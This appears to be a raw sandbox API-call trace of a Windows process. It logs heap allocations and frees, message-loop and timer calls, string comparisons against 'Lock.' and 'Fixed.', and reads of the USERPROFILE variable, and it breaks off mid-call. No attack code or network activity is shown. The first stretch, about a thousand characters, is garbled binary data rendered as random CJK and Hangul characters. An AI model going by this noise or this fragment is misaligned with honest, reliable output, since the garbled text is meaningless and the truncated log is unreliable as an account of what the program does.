瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.000] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0154.000] TranslateMessage (lpMsg=0x8cf968) returned 0 [0154.000] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0154.000] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0154.000] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0154.000] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.000] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.000] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0154.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pplication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cation Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0154.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0154.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0154.001] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0154.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0154.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69a00 [0154.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pplication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cation Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a734f8 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.003] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0154.003] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0154.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0154.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0154.004] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.004] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0154.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68430 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0154.005] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0154.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0154.006] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68430 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a68430 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0154.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0154.006] RtlAllocateHeap 